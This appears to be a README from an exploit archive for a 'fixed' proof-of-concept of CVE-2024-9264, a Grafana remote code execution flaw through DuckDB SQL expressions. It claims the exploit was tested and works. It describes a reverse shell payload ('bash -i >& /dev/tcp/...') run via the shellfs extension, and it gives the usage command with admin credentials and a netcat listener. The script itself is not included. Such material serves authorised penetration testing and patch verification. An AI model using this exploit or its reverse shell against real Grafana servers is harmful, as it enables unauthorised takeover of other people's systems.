Source: https://sploitus.com/exploit?id=07B1895C-6981-5395-9E9A-4B9615DFAAD5
# 🛠️ CVE-2024-9264 - Fixed Grafana RCE Exploit

This is a **fixed version** of the proof-of-concept exploit for **CVE-2024-9264**, a critical remote code execution vulnerability in Grafana (via SQL expressions and DuckDB).

🔗 Original advisory: [Grafana Security Release](https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/)  
❌ Original PoC: Broken due to syntax errors and incorrect use of `write_file()`  
✅ This version works, tested on a vulnerable Grafana 11.0.0 instance.

---

## ✅ Fixes in this version

- ✅ Correctly uses `writefile()` instead of `write_file()` (DuckDB function)
- ✅ Proper shell payload using `bash -i >& /dev/tcp/...`
- ✅ Reverse shell written and executed successfully via `shellfs` extension

---

## 📦 Requirements

- Grafana instance with:
  - DuckDB backend
  - Ability to `install shellfs from community`
- A netcat listener on your attacker machine

---

## 🚀 Usage

```bash
python3 fixed_poc_writefile.py \
  --url http://target:3000 \
  --username admin \
  --password admin \
  --reverse-ip <YOUR_IP> \
  --reverse-port 4444
```

Then listen with:

```bash
nc -lvnp 4444
```

---

## ⚠️ Legal Disclaimer

This project is **for educational purposes only**.  
Do not use it against targets you do not have permission to test.

---

## โœ๏ธ Author of this Fix

Modified and validated by [Exerr](https://github.com/Exerrdev); original PoC by z3k0sec.